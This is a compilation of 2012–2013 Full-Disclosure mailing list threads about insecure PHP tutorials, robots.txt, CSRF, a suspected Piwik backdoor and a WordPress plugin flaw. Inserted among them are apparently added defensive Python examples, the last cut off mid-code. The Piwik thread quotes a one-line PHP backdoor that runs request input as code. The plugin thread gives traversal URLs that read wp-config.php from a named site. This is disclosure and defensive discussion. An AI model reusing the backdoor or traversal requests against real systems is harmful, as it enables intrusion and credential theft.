Re: [Full-disclosure] SANS PHP Port Scanner Remote Code Execution
Andrew,

You realize this guy is trying to advise people through a tutorial? It's not like we're talking about average Joe shipping buggy software... people *teaching bad practices,* especially in this field should be shot dead before they do any more damage. You just can't learn how to code by teaching others to do it wrongly.

Pointing back to my comprehensive list, the author missed some of the very basics of programming in general (undefined variables, no indentation..).

Chris.

On Fri, Mar 8, 2013 at 2:14 AM, Andrew King aking1012@gmail.com wrote:

Has anyone considered that loads of stuff is shipped bugged? I mean it's not like they hosted it on their site executable. It's also not like we're talking about vsftpd where it's installed for a legitimate purpose on millions if not billions of PCs. The million eyeball test and trolling a company where one person might have to read 15 articles a day in addition to actual job duties are not even in the same realm. Add to that maybe backdoor software like sub7 had administrative access backdoors. The list goes on. All I'm saying is don't be dense.

On Wed, Mar 6, 2013 at 2:57 AM, Christian Sciberras uuf6...@gmail.com wrote:

Ulisses,

No, I'm blaming developers that are not in the field of security for this mess.

Chris.

On Wed, Mar 6, 2013 at 1:10 PM, Ulisses Montenegro ulisses.montene...@gmail.com wrote:

Christian

If you're reading my email as it's the developers' fault, then you got it wrong -- I've been a developer for most of my life. And while things have gotten better in the last years, there are still tons of build your blog 15 minutes or develop a twitter clone in 2h tutorials/advertisements for various platforms and languages out there which either assume security is a non-issue, or assume the platform/language will take care of it for you.

Heck, the manpages for some libc functions on non-GNU platforms still show vulnerable code in examples. perldoc is riddled with code that is just enough to show how a given function should be used, but with no validation whatsoever. I remember reading the training material for an Oracle product (sorry, I really can't recall the name) which touted being able to have the application security handled by infrastructure/middleware components as a desirable feature.

So while I'd agree that we are getting better at this, we're still far from ideal. The canonical hello world for most languages/platforms out there, in most cases, still does not make explicit references to security issues.

On Wed, Mar 6, 2013 at 8:49 AM, Christian Sciberras uuf6...@gmail.com wrote:

The article actually recommends looking for information from www.w3schools.com http://www.w3fools.com?!

Here's a few other obviously missing things:
- script requires input but does not check for it (very bad PHP practice)
- what the hell is with that code? Ever heard about indentation?
- there should be some very basic sanitization; ints be ints and strings be strings
- hiding all errors, that was a very smart thing to do
- early 20's html and css coding style to boot

Regarding the tool itself, obviously it's not meant to be used publicly, hence why I could close my eye in this respect.

Ulisses, developers already do this. Actually, they've been doing it for quite some time. Perhaps the security experts writing tutorials as in that article should follow?

On Wed, Mar 6, 2013 at 11:55 AM, Dan Ballance tzewang.do...@gmail.com wrote:

+1

On 6 Mar 2013 10:41, Ulisses Montenegro ulisses.montene...@gmail.com wrote:

Not including proper input validation and error handling in code samples is one of the most common and harmful practices in the software development industry -- doing it is not optional or advanced, it is mandatory unless you want to be pwned. Developers need to start doing things properly from the very beginning, as habits become harder and harder to change with experience.

On Wed, Mar 6, 2013 at 7:33 AM, Benji m...@b3nji.com wrote:

Actually, adding input sanitisation really wouldn't increase the code size that much. Are you just incompetent?

On Wed, Mar 6, 2013 at 7:46 AM, Źmicier Januszkiewicz ga...@tut.by wrote:

Dear list,

Well, I suppose this had to be a proof-of-concept piece of code to demonstrate how port scanning can be done in PHP, not a production-grade software. Adding input sanitization would increase the code size by a lot and obscure the concept somewhat (not that there is much to be said about the concept though). Think we can give the dude some discount for that.

Nevertheless, seeing something like this coming from Certified Ethical Hacker and Security + certified makes me doubt the worthiness of those certificates. Could be nice to know the exact naming of those certificates to properly disregard them in the future.

With best regards,
Z.

2013/3/6 laurent gaffie laurent.gaf...@gmail.com http
Re: [Full-disclosure] SANS PHP Port Scanner Remote Code Execution
The article actually recommends looking for information from www.w3schools.com http://www.w3fools.com?!

Here's a few other obviously missing things:
- script requires input but does not check for it (very bad PHP practice)
- what the hell is with that code? Ever heard about indentation?
- there should be some very basic sanitization; ints be ints and strings be strings
- hiding all errors, that was a very smart thing to do
- early 20's html and css coding style to boot

Regarding the tool itself, obviously it's not meant to be used publicly, hence why I could close my eye in this respect.

Ulisses, developers already do this. Actually, they've been doing it for quite some time. Perhaps the security experts writing tutorials as in that article should follow?

On Wed, Mar 6, 2013 at 11:55 AM, Dan Ballance tzewang.do...@gmail.com wrote:

+1

On 6 Mar 2013 10:41, Ulisses Montenegro ulisses.montene...@gmail.com wrote:

Not including proper input validation and error handling in code samples is one of the most common and harmful practices in the software development industry -- doing it is not optional or advanced, it is mandatory unless you want to be pwned. Developers need to start doing things properly from the very beginning, as habits become harder and harder to change with experience.

On Wed, Mar 6, 2013 at 7:33 AM, Benji m...@b3nji.com wrote:

Actually, adding input sanitisation really wouldn't increase the code size that much. Are you just incompetent?

On Wed, Mar 6, 2013 at 7:46 AM, Źmicier Januszkiewicz ga...@tut.by wrote:

Dear list,

Well, I suppose this had to be a proof-of-concept piece of code to demonstrate how port scanning can be done in PHP, not a production-grade software. Adding input sanitization would increase the code size by a lot and obscure the concept somewhat (not that there is much to be said about the concept though). Think we can give the dude some discount for that.

Nevertheless, seeing something like this coming from Certified Ethical Hacker and Security + certified makes me doubt the worthiness of those certificates. Could be nice to know the exact naming of those certificates to properly disregard them in the future.

With best regards,
Z.

2013/3/6 laurent gaffie laurent.gaf...@gmail.com

http://resources.infosecinstitute.com/php-build-your-own-mini-port-scanner/

Finding the vulnerability in this code is left as an exercise to the reader.

PS: *Your comment will be awaiting moderation forever.*

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

--
“If debugging is the process of removing software bugs, then programming must be the process of putting them in.” - *Edsger Dijkstra*
Re: [Full-disclosure] SANS PHP Port Scanner Remote Code Execution
Ulisses,

No, I'm blaming developers that are not in the field of security for this mess.

Chris.

On Wed, Mar 6, 2013 at 1:10 PM, Ulisses Montenegro ulisses.montene...@gmail.com wrote:

Christian

If you're reading my email as it's the developers' fault, then you got it wrong -- I've been a developer for most of my life. And while things have gotten better in the last years, there are still tons of build your blog 15 minutes or develop a twitter clone in 2h tutorials/advertisements for various platforms and languages out there which either assume security is a non-issue, or assume the platform/language will take care of it for you.

Heck, the manpages for some libc functions on non-GNU platforms still show vulnerable code in examples. perldoc is riddled with code that is just enough to show how a given function should be used, but with no validation whatsoever. I remember reading the training material for an Oracle product (sorry, I really can't recall the name) which touted being able to have the application security handled by infrastructure/middleware components as a desirable feature.

So while I'd agree that we are getting better at this, we're still far from ideal. The canonical hello world for most languages/platforms out there, in most cases, still does not make explicit references to security issues.

On Wed, Mar 6, 2013 at 8:49 AM, Christian Sciberras uuf6...@gmail.com wrote:

The article actually recommends looking for information from www.w3schools.com http://www.w3fools.com?!

Here's a few other obviously missing things:
- script requires input but does not check for it (very bad PHP practice)
- what the hell is with that code? Ever heard about indentation?
- there should be some very basic sanitization; ints be ints and strings be strings
- hiding all errors, that was a very smart thing to do
- early 20's html and css coding style to boot

Regarding the tool itself, obviously it's not meant to be used publicly, hence why I could close my eye in this respect.

Ulisses, developers already do this. Actually, they've been doing it for quite some time. Perhaps the security experts writing tutorials as in that article should follow?

On Wed, Mar 6, 2013 at 11:55 AM, Dan Ballance tzewang.do...@gmail.com wrote:

+1

On 6 Mar 2013 10:41, Ulisses Montenegro ulisses.montene...@gmail.com wrote:

Not including proper input validation and error handling in code samples is one of the most common and harmful practices in the software development industry -- doing it is not optional or advanced, it is mandatory unless you want to be pwned. Developers need to start doing things properly from the very beginning, as habits become harder and harder to change with experience.

On Wed, Mar 6, 2013 at 7:33 AM, Benji m...@b3nji.com wrote:

Actually, adding input sanitisation really wouldn't increase the code size that much. Are you just incompetent?

On Wed, Mar 6, 2013 at 7:46 AM, Źmicier Januszkiewicz ga...@tut.by wrote:

Dear list,

Well, I suppose this had to be a proof-of-concept piece of code to demonstrate how port scanning can be done in PHP, not a production-grade software. Adding input sanitization would increase the code size by a lot and obscure the concept somewhat (not that there is much to be said about the concept though). Think we can give the dude some discount for that.

Nevertheless, seeing something like this coming from Certified Ethical Hacker and Security + certified makes me doubt the worthiness of those certificates. Could be nice to know the exact naming of those certificates to properly disregard them in the future.

With best regards,
Z.

2013/3/6 laurent gaffie laurent.gaf...@gmail.com

http://resources.infosecinstitute.com/php-build-your-own-mini-port-scanner/

Finding the vulnerability in this code is left as an exercise to the reader.

PS: *Your comment will be awaiting moderation forever.*

--
“If debugging is the process of removing software bugs, then programming must be the process of putting them in.” - *Edsger Dijkstra*
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000 students personal data
he retries and *minutes* after that the phone's ringing - from what I know of Canada's system, only 24/7 official eavesdropping could lead to such a short delay

Website load monitoring == eavesdropping?

On Tue, Jan 22, 2013 at 8:37 AM, jason swor...@gmail.com wrote:

On Mon, Jan 21, 2013 at 5:54 PM, Jeffrey Walton noloa...@gmail.com wrote:

On Mon, Jan 21, 2013 at 5:42 PM, Philip Whitehouse phi...@whiuk.com wrote:

Moreover, he ran it again after reporting it to see if it was still there. Essentially he's doing an unauthorised pen test having alerted them that he'd done one already.

If his personal information is in the proprietary system, I believe he has every right to verify the security of the system.

what
Re: [Full-disclosure] how to sell and get a fair price
Valdis, we've had spam companies suing blacklist/antispam companies before... Surely an anonymous person legitimately and legally enforcing copyright can't be harder?

On Mon, Jan 14, 2013 at 9:39 PM, valdis.kletni...@vt.edu wrote:

On Thu, 10 Jan 2013 12:03:03 -0500, Mikhail A. Utin said:

After all, a vulnerability and an exploit are intellectual products. Not sure copyright could be claimed, but why not?

Actually, claimed or not, if the exploit was coded in a Berne signatory country, it's almost always automatically copyrighted at creation (most likely to the coder, or to their employer if it was a work-for-hire). In the US, there's an exemption for work product of federal employees - that's one of the few ways for US-produced material to become public domain (expiration of term is the other one, but with ever-increasing copyright terms, it's unclear that anything will ever actually expire in the US).

More interesting is the question of how to enforce a copyright claim while remaining anonymous...
Re: [Full-disclosure] how to sell and get a fair price
Couldn't one talk through a lawyer? Guess in such a case it would be a matter of how much you trust your lawyer. Also, what stops a person to file it under a company name if that's easier?

I admit I'm not into this area, so I might be missing something fundamental...

Chris.

On Mon, Jan 14, 2013 at 10:34 PM, valdis.kletni...@vt.edu wrote:

On Mon, 14 Jan 2013 22:17:12 +0100, Christian Sciberras said:

Valdis, we've had spam companies suing blacklist/antispam companies before... Surely an anonymous person legitimately and legally enforcing copyright can't be harder?

Yes, but the spam companies at least filed under their own name. Running a lawsuit with a John Doe plaintiff is a little bit harder, and requires finding a cooperative lawyer and judge.

The really hard part is proving that you're the rightful owner of the copyright while remaining anonymous (in particular, proving you're the *same* anonymous person who wrote the code). At this point, it helps if you posted the item in question signed with a pseudonymous PGP key that you control, or have other ways to prove that your anonymous is the author's anonymous.
Re: [Full-disclosure] Question regarding script vulnerabilities
To be honest, I don't understand the question. Malicious scripts running on your server are a concern, regardless of type of hosting service or a trustworthy provider.

Chris.

On Thu, Dec 20, 2012 at 2:00 PM, Philip Whitehouse phi...@whiuk.com wrote:

Malicious scripts are generally designed to one of two targets:

1) The user-base of the target. An XSS vulnerability typically gives you the ability to hijack a user's browser, possibly allowing remote code execution on their machine or intercepting keystrokes while on the site. In addition to allowing your users' (and admins') data to be harvested you suffer reputational damage.

2) Remote code targeting the actual site. If the file has permissions, it could delete files on the server.

So now we have established the purpose, let's consider deployment:

1) File upload. Many websites deliberately allow file upload (avatars on forums, images for blog posts, shared files and so forth). If not correctly sanitised there is little stopping them uploading a server side script, client side script or other nefarious file. Incidentally this was the main threat of the image exploit - websites couldn't guarantee uploaded avatars didn't contain executable code.

2) Script tags. Typically forums will sanitise text to remove script tags. Blogs are often less punitive. If anyone can upload HTML raw then via privilege escalation or hijack there is the potential for an attacker.

To be honest if you even slightly suspected your host, you're screwed - malicious scripts are the least of your problems...

Philip Whitehouse

On 19 Dec 2012, at 05:25, Rand McRanderson therands...@gmail.com wrote:

I was curious, if you have a virtual dedicated server or a dedicated server, and a reasonably trustworthy hosting service, are malicious scripts planted by external people a big concern? If so why?
Re: [Full-disclosure] Google's robot.txt handling
If you ask me, it's a stupid idea. :)

I prefer to know where I am with a service; and (IMHO) I would prefer to query (occasionally) Google for my CC instead of waiting for someone to start taking funds off it. Hiding it only provides a false sense of security - it will last until someone finds the service leaking out CCs. This is especially the case with robots.txt.

Can someone on the list please define a good web crawler? There's plenty of crawlers out there, most are relatively unknown how will we know which to trust?

I think the problem here is that people are plain stupid and throw in direct entries inside robots.txt, whereas they should be sending wildcard entries. Couple that with actually protecting sensitive areas, and it's a pretty good defence.

On a side note, someone already said this, but I'll repeat it for effect: don't throw in anything on the Net which you're not prepared to protect. If a control panel should not be accessible to the general public, consider restricting access by IP and similar measures. Even a personal certificate is a valid layer of defence...

Chris.

On Tue, Dec 11, 2012 at 10:38 PM, Jeffrey Walton noloa...@gmail.com wrote:

On Tue, Dec 11, 2012 at 4:11 PM, Mario Vilas mvi...@gmail.com wrote:

I think we can all agree this is not a vulnerability. Still, I have yet to see an argument saying why what the OP is proposing is a bad idea. It may be a good idea to stop indexing robots.txt to mitigate the faults of lazy or incompetent admins (Google already does this for many specific search queries) and there's not much point in indexing the robots.txt file for legitimate uses anyway.

I kind of agree here. The information is valuable for the reconnaissance phase of an attack, but it's not a vulnerability per se. But what is to stop the attacker from fetching it himself/herself since it's at a known location for all sites? In this case, Google would be removing aggregated search results (which means the attacker would have to compile it himself/herself). Google removed other interesting searches, such as social security numbers and credit card numbers (or does not provide them to the general public).

Jeff

On Tue, Dec 11, 2012 at 2:01 PM, Scott Ferguson scott.ferguson.it.consult...@gmail.com wrote:

If I understand the OP correctly, he is not stating that listing something in robots.txt would make it inaccessible, but rather that Google indexes the robots.txt files themselves,

snipped

Well, um, yeah - I got that. So you are what, proposing that moving an open door back a few centimetres solves the (non) problem?

Take your proposal to its logical extension and stop all search engines (especially the ones that don't respect robots.txt) from indexing robots.txt. Now what do you do about Nutch or even some perl script that anyone can whip up in 2 minutes?

Security through obscurity is fine when coupled with actual security - but relying on it alone is just daft. Expecting the world to change so bad habits have no consequence is dangerously naive.

I suspect you're looking too hard at finding fault with Google - who are complying with the robots.txt. Read the spec. - it's about not following the listed directories, not about not listing the robots.txt. Next you'll want laws against bad weather and furniture with sharp corners.

Don't put things you don't want seen to see in places that can be seen.

On Mon, Dec 10, 2012 at 8:19 PM, Scott Ferguson scott.ferguson.it.consulting () gmail com wrote:

/From/: Hurgel Bumpf l0rd_lunatic () yahoo com
/Date/: Mon, 10 Dec 2012 19:25:39 + (GMT)

Hi list,

i tried to contact google, but as they didn't answer my email, i do forward this to FD. This security feature is not clearly a google vulnerability, but exposes websites informations that are not really intended to be public.

Conan the bavarian

Your point eludes me - Google is indexing something which is publicly available. eg.:- curl http://somesite.tld/robots.txt So it seems the solution to the question you raise is, um, nonsensical.

If you don't want something exposed on your web server *don't publish references to it*.

The solution, which should be blindingly obvious, is don't create the problem in the first place. Password sensitive directories (htpasswd) - then they don't have to be excluded from search engines (because listing the inaccessible in robots.txt is redundant). You must have missed the first day of web school.
Re: [Full-disclosure] The email that hacks you
From an architectural perspective, auto logins or whatever they're called should work through a random string, just as most providers already do. There is absolutely no reason to pass the username/password from a URL, especially when in plain text as in these cases.

Since there is no loss of features (there are safer, saner, sensible alternatives), I think this is better considered a bug, since it is never actually needed in the first place.

Also, with the random token system, I think it is best to still require the user/pass when the URL the user is directed to is going to do something such as modifying/updating stuff.

Chris.

On Wed, Nov 28, 2012 at 12:15 PM, Bogdan Calin bog...@acunetix.com wrote:

Yes, I agree with you. However, my opinion is that it should be fixed once and for all in iOS/Webkit (and the other browsers) by disabling resources loaded with credentials.

At some point, as a protection for phishing, URLs with the format scheme://username:password@hostname/ were disabled. When you enter in the browser bar something like that it doesn't work in most browsers.

I was surprised to see that doing something like image src='scheme://username:password@hostname/path' works in Chrome and Firefox but if you enter the same URL in the browser bar it doesn't work. This doesn't work in Internet Explorer, which is the right behavior in my opinion.

I don't see any good reason why something like this should work. Closing this in browsers will solve this problem once and for all.

On 11/28/2012 1:00 PM, Guifre wrote:

Hello,

I can also confirm that this attack works on iPhone, iPad and Mac's default mail client. Of course, it works anywhere where arbitrary client-side code can be executed...

IMAHO, the issue here is not your iphone loading images, there are millions of attack vectors to trigger this attack... The problem is the CSRF weaknesses of your router admin panel that should be fixed by synchronizing a secret token or by using any other well known mitigation strategy against these attacks.

Best Regards,
Guifre.

--
Bogdan Calin - bogdan [at] acunetix.com
CTO Acunetix Ltd. - http://www.acunetix.com
Acunetix Web Security Blog - http://www.acunetix.com/blog
Follow us on Twitter - http://www.twitter.com/acunetix
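The two mitigations named in this thread (a random, single-use string for auto-login links, and a synchronized secret token on state-changing requests, with the password still required before anything is modified) can be combined as below. This is an added example, not code from any poster or product in the thread; the names AutoLoginLinks, Session, authorize and the host panel.example are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass, field

TOKEN_TTL = 15 * 60  # seconds a mailed link stays valid (assumed policy)


@dataclass
class Session:
    user: str
    reauthenticated: bool = False  # set True only after a password check
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


class AutoLoginLinks:
    """Server-side store for one-time login links (hypothetical helper)."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._pending = {}  # sha256(token) -> (user, expiry timestamp)

    @staticmethod
    def _digest(token):
        # Only a hash is stored, so a leaked table does not yield usable links.
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user):
        """Return a URL that carries a random string, never credentials."""
        token = secrets.token_urlsafe(32)
        self._pending[self._digest(token)] = (user, self._clock() + TOKEN_TTL)
        return "https://panel.example/auto?t=" + token  # placeholder host

    def redeem(self, token):
        """Exchange a token for a session; each token works at most once."""
        entry = self._pending.pop(self._digest(token), None)
        if entry is None:
            return None
        user, expiry = entry
        if self._clock() > expiry:
            return None
        return Session(user)


def authorize(session, method, submitted_csrf=None):
    """Decide whether a request may proceed.

    Reads are allowed for any valid session. State-changing requests need
    a password re-check on this session and the session's CSRF token,
    which a cross-site image or form request cannot know.
    """
    if session is None:
        return False
    if method in ("GET", "HEAD"):
        return True
    if not session.reauthenticated or submitted_csrf is None:
        return False
    return hmac.compare_digest(session.csrf_token.encode(),
                               submitted_csrf.encode())


if __name__ == "__main__":
    links = AutoLoginLinks()
    url = links.issue("alice")
    session = links.redeem(url.split("t=", 1)[1])
    print("read allowed:", authorize(session, "GET"))
    print("write before password:", authorize(session, "POST", session.csrf_token))
    session.reauthenticated = True
    print("write after password:", authorize(session, "POST", session.csrf_token))
```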
Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
At the moment I'm trying to figure out the further sense of this code, but it seems that there might also be some kind of backdoor (because of the use of $_GET).

preg_replace(/(.+)/e, $_GET['g'], 'dwm');

You think?

Chris.

On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker m...@grobecker-wtal.de wrote:

preg_replace(/(.+)/e, $_GET['g'], 'dwm');
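The quoted line uses the /e pattern modifier, which makes PHP evaluate the replacement string as code; the modifier was deprecated in PHP 5.5 and removed in PHP 7.0. The following added example (not from the thread or from Piwik) is a small scanner for reviewing a download archive for such calls; the function name scan_php and the sample file contents are constructed for illustration, apart from the one line quoted in the post.

```python
import re

# PHP superglobals that carry request-controlled data.
SUPERGLOBAL_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER|FILES)\b")

# First argument of preg_replace written as a literal: optional quote, a
# delimiter, the pattern body, the same delimiter, then modifier letters.
# The quote is optional because mail archives (as in the post above) often
# strip it. Patterns held in variables or using bracket-style delimiters
# are not covered by this expression.
CALL_RE = re.compile(
    r"preg_replace\s*\(\s*"
    r"(?P<quote>['\"]?)(?P<delim>[/#~@!%|])(?P<body>.*?)(?P=delim)"
    r"(?P<mods>[A-Za-z]*)(?P=quote)\s*,"
    r"(?P<rest>[^;]*)",
    re.S | re.I,
)


def scan_php(source):
    """Return one finding per preg_replace call that uses the /e modifier.

    severity is "critical" when the call also references request data
    (the replacement is then attacker-supplied code), else "review".
    """
    findings = []
    for m in CALL_RE.finditer(source):
        if "e" not in m.group("mods"):
            continue
        tainted = SUPERGLOBAL_RE.search(m.group("body") + m.group("rest"))
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "modifiers": m.group("mods"),
            "severity": "critical" if tainted else "review",
            "call": " ".join(m.group(0).split()),
        })
    return findings


# Constructed sample file. Line 3 is the line quoted in the post, kept as
# it appears there; the other lines are made up for contrast.
SAMPLE = r"""<?php
$clean = preg_replace("/\s+/", " ", $title);
preg_replace(/(.+)/e, $_GET['g'], 'dwm');
$html = preg_replace('#\[b\](.*?)\[/b\]#ie', "strtoupper('$1')", $text);
$slug = preg_replace('/[^a-z0-9]+/i', '-', $name);
"""

if __name__ == "__main__":
    for f in scan_php(SAMPLE):
        print(f"line {f['line']}: {f['severity']}: {f['call']}")
```

A "review" hit is legacy code that needs porting to preg_replace_callback; a "critical" hit in a vendor archive is grounds to stop and compare the archive against a known-good copy.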
Re: [Full-disclosure] phpmyadmin compromised?
That is not a compromise. It is related to a change in encoding. Please clear your cookies and try again.

(I've had this exact problem in the past, but I don't remember the details)

Chris.

On Mon, Nov 19, 2012 at 5:48 PM, Benji m...@b3nji.com wrote:

.. could you have provided any less information? why don't you look through your code instead of emailing a screenshot to a mailing list? really?

On Mon, Nov 19, 2012 at 4:47 PM, Benji m...@b3nji.com wrote:

.. coul

On Mon, Nov 19, 2012 at 4:45 PM, Lucio Crusca lu...@sulweb.org wrote:

Hello *,

I've setup my browser to remember login password at my server phpmyadmin login page. It usually fills the two fields correctly, but today it showed this crap instead:

http://img208.imagevenue.com/img.php?image=38933_php_myadmin_compromised_122_430lo.jpg

Since I've already suffered a security breach through phpmyadmin in the past, I immediately suspected another one. Please note that phpmyadmin is shielded by http digest authentication since the previous accident.

Are you aware of any security problems related to phpmyadmin (or to Iceweasel 10 for that matter) that can cause such garbage on the login page?

Thanks in advance
Lucio.
Re: [Full-disclosure] **VL-JUNK** Re: Skype account + IM history hijack vulnerability
I don't want to justify their problems, but let me answer your question:

First and foremost the recent problem seems to be caused by the online service, not their clients. In fact, I don't see it remotely related to the skype client.

Secondly, proper security measures do not make you automagically sound when it comes to business logic. Even if they directed all the penetration tools there is out there, this situation might still have gone unnoticed.

Also, next time, just don't reply with nonconstructive comments at all, if you have nothing better to say. It is always easy to bash $company when something comes up. Something you should think about, that stupid idiotic flawed company owns assets you don't even come close to.

Again, I've nothing to do with Skype, I'm just irritated by the modern attitude of situations like these by clueless people.

Chris.

On Wed, Nov 14, 2012 at 12:15 PM, Chris C. Russo ch...@calciumsec.com wrote:

I'm just not replying, because I have no comments, I can't believe how a huge service like skype doesn't have proper security measures in their website and client.

Chris C. Russo
We develop solutions to make the world a safer place; we know the value of your information.
w: www.calciumsec.com
m: ch...@calciumsec.com
m: +54-911 6610-1900

On 14/11/2012 08:00 a.m., Benji wrote:

This has nothing to do with the client. The service is at fault. Also for the record, r/netsec is a huge circlejerk.

On Wed, Nov 14, 2012 at 10:20 AM, Kirils Solovjovs kirils.solovj...@kirils.com wrote:

The team has worked around this and are now trying to fix the bug/feature. :)

http://www.reddit.com/r/netsec/comments/13664q/skype_vulnerability_allowing_hijacking_of_any/

P.S. Not to say that there aren't any other security bugs to come. Use a secure client!

--
Kirils Solovjovs
Re: [Full-disclosure] 0-day vulnerabilities in Call of Duty MW3 and CryEngine 3
0-day means it is being actively used in the wild. Is this the case?

Chris.

On Wed, Nov 14, 2012 at 10:52 AM, ReVuln i...@revuln.com wrote:

Following our presentation at POC2012 [1] conference, we have released: a paper [2] regarding a NULL pointer dereference vulnerability affecting Call of Duty: Modern Warfare 3 [3], and a video [4] demonstrating a remote code execution vulnerability affecting CryEngine 3 [5].

[1] http://powerofcommunity.net
[2] http://revuln.com/files/ReVuln_CoDMW3_null_pointer_dereference.pdf
[3] http://www.callofduty.com/mw3
[4] http://vimeo.com/53425372
[5] http://www.crytek.com/cryengine/cryengine3

---
ReVuln
http://revuln.com
http://twitter.com/revuln
Re: [Full-disclosure] Is it OK to hold credit card numbers in cookies? Santander?
Alex, you just dug your grave there, mate. ;-)

On Mon, Oct 15, 2012 at 9:53 PM, Alexander Georgiev alexander.georg...@daloo.de wrote: Well, if we talk about Banks... Hypo Vereinsbank (http://en.wikipedia.org/wiki/HypoVereinsbank) has kind of a strange security style: The online banking website will disable your login once you enter it 3 times wrong. Your login is your BANK ACCOUNT NUMBER. To re-enable it you have to go into one of their offices IN PERSON and identify yourself by ID card and then they will send your new password BY LETTER (not email). Now, PLEASE, when you go to their online banking site and run your one_script_to_block_them_all.py or whatever, PLEASE, skip my bank account, ok? Banking regards, Alex

On Mon, 15 Oct 2012 21:10:47 +0200, Rainer Duffner rai...@ultra-secure.de wrote:

On 14.10.2012 at 17:15, auto62098...@hushmail.com wrote: Santander are a joke when it comes to security. Fed up of two years of battling with them to fix issues any other bank would have fixed in seconds, things like XSS on login pages etc. Time to hit full disclosure with some of these issues in the hope they'll change their game and start to take their customers' security seriously:

I had to chuckle. The Spanish banks gave 100% mortgages to people who could just barely finance the interest at ultra-low rates. Now, they're taking back those houses and flats, evicting the owners (who can no longer pay) and putting them into rented apartments (for slightly less than the interest rates). The banks were bailed-out by the government, which has now got to be bailed-out by the EU. Do you honestly think that customers actually exist on the radar of those banks? Hell - who needs customers, when you can have a bail-out?
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
His initial email doesn't make him look like a newb? Really? Quoting: It appears Adobe has become a whore to Google like Mozilla. Typical response from an attention-starved kid. Except he's no kid. Hmmm. Then there's the whole bullshit he's been talking about - which by the way, several people categorically proved to be inaccurate, if not plain wrong.

On Sat, Sep 8, 2012 at 1:15 AM, Mark boogiebr...@yahoo.co.uk wrote: You're right. Jeffrey is no newb. Sorry if it came over the wrong way.

On 08/09/2012 0:31, Michael D. Wood wrote: You guys are acting like Jeffrey is a newb to all this stuff. I'm sure he knows what mbam and spybot are, and is able to scan his machine. I'm sure he knows to go straight to the source when downloading flash player, albeit Adobe does include the annoying toolbar unless you choose not to install. -- Michael D. Wood ITSecurityPros.org www.itsecuritypros.org

- Reply message - From: Mark boogiebr...@yahoo.co.uk To: noloa...@gmail.com Cc: Full Disclosure b full-disclosure@lists.grok.org.uk, BugTraq bugt...@securityfocus.com Subject: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent Date: Fri, Sep 7, 2012 5:32 pm

You didn't download it from download.cnet.com, by any chance? Sounds more like an infection to me. For windows, download and run the following programs. http://www.filehippo.com/download_malwarebytes_anti_malware/ http://www.filehippo.com/download_spybot_search_destroy/5168/ http://www.filehippo.com/download_superantispyware/

On 06/09/2012 19:09, Jeffrey Walton wrote: The company that writes the world's most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe.

[1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
[2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
[3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
[4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
Yeah. +1 Troll. (and I don't even like Adobe!)

On Thu, Sep 6, 2012 at 7:09 PM, Jeffrey Walton noloa...@gmail.com wrote: The company that writes the world's most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe.

[1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
[2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
[3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
[4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
Re: [Full-disclosure] cloudsafe365 for wordpress: file disclosure
So this plugin supposedly helps securing a website? ...

On Tue, Aug 28, 2012 at 10:50 AM, Henri Salo he...@nerv.fi wrote:

On Tue, Aug 28, 2012 at 10:29:46AM +0200, Jan van Niekerk wrote: This wordpress security plugin lets you read arbitrary files on the system. Looking at the code, there will be plenty of stuff like this. Demo: http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php Disclosure timeline: * Today: visit wordpress.org * Try to report bug * System wants login * Visit web site: vendor has no e-mail address and stupid one-liner contact form and hidden name * Stuff it, I'm not going to phone them

I can verify and report this. Could you list all the vulnerabilities you can find from the plugin? You can also contact plugins@wordpress.org address in case you found vulnerabilities from WordPress plugins in the future. - Henri Salo
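The `file=../../../../../wp-config.php` request quoted in this thread is a path traversal through an editor endpoint's file parameter. The following is an added example, not the plugin's code and not part of the original messages: it contrasts an assumed join-and-open pattern with a confined resolver. The function names, the directory layout and the extension allow-list are hypothetical, and the file tree is constructed for the demonstration.

```python
import os
import tempfile


class PathEscape(ValueError):
    """The requested name resolves outside the directory being served."""


def naive_resolve(base_dir, requested):
    # Assumed vulnerable pattern (not the plugin's code): join and use as-is.
    return os.path.normpath(os.path.join(base_dir, requested))


def resolve_editable(base_dir, requested, allowed_ext=(".html", ".css")):
    """Map an untrusted `file` parameter to a real file under base_dir."""
    if not requested or "\x00" in requested:
        raise ValueError("empty name or NUL byte")
    base = os.path.realpath(base_dir)
    # realpath collapses "..", follows symlinks, and lets an absolute
    # `requested` replace base entirely, so the check below sees the
    # path the OS would really open.
    candidate = os.path.realpath(os.path.join(base, requested))
    # Compare whole path components; a string-prefix test would accept
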